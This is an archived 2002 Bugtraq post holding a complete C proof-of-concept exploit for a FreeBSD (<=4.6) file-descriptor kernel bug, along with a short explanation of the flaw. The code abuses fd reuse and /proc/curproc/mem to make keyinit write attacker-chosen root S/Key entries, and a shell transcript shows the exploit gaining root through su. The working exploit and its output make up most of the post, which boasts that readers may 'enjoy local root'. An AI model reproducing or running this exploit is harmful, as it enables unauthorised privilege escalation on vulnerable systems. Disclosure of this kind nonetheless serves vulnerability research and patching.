Freebsd FD exploit
Date: Sun, 18 Aug 2002 21:01:13 -0400
From: dvdman <dvdman@l33tsecurity.com>
To: bugtraq@lists.securityfocus.com
Subject: Freebsd FD exploit
------=_NextPart_000_0056_01C246FA.62C4ACE0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd
thought they fixed this months ago well guess again :P Thanks to the
Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */
------=_NextPart_000_0056_01C246FA.62C4ACE0
Content-Type: application/octet-stream;
name="iosmash2.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="iosmash2.c"
/* Proof Of Concept exploit for the Freebsd file descriptors bug. =
Freebsd=20
thought they fixed this months ago well guess again :P Thanks to the=20
Freebsd kernel you may now enjoy local root on all freebsd <=3D4.6 ;) */
/* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I =
AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM=20
FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM =
FREE**I=20
AM FREE* */
DVDMAN(DVDMAN@L33TSECURITY.COM)
Visit Us: irc.efnet.org #l33tsecurity
www.l33tsecurity.com
And Freebsd thought they fixed this :P
GREETS:
thanks phased for skeys from iosmash.c :)
thanks all of #l33tsecurity for support
thanks Georgi Guninski for ideas
Details:=20
Several months ago Joost Pol <joost@pine.nl> made public almost the same
problem. FreeBSD fixed it, but the patch does not cover all the cases. =
In
some cases the kernel closes fds 0..2 after they are assigned to =
/dev/null,
leaving the system open to an attack. If a +s file is execed and fds =
0..2
are opened to /proc/curproc/{special} then the kernel forcefully closes
them and open() then reuses them.
this program makes the following skeys valid
95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO
PROOF:
[dvdman@xxxx:~]$ uname -a
FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT =
2002 dvdman@xxxx:/usr/obj/usr/src/sys/xxx i386
[dvdman@xxxx:~]$ gcc iosmash2.c
[dvdman@xxxx:~]$ ./a.out
Adding dvdman:
ctrl-c
[dvdman@xxxx:~]$ su
s/key 98 snosoft2
Password:
[root@xxxx:/home/dvdman]#
*/
=20
=20
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
int main(int argc, char *argv[])
{
int f;
int ret;
while(dup(1) !=3D -1) {};
close(2);
close(3);
f=3Dopen("/proc/curproc/mem",O_WRONLY);
if (f=3D=3D-1) fprintf(stdout,"Error in open /proc\n");
fprintf(stdout,"press ctrl-c when adding...");
ret =3D execl("/usr/bin/keyinit","\nroot 0099 snosoft2 =
6f648e8bd0e2988a Apr 23,2666 01:02:03\n",0);
if(ret =3D=3D -1) {
fprintf(stdout,"execl() failed: %s (%d)\n",strerror(errno),errno);
}
}
------=_NextPart_000_0056_01C246FA.62C4ACE0--
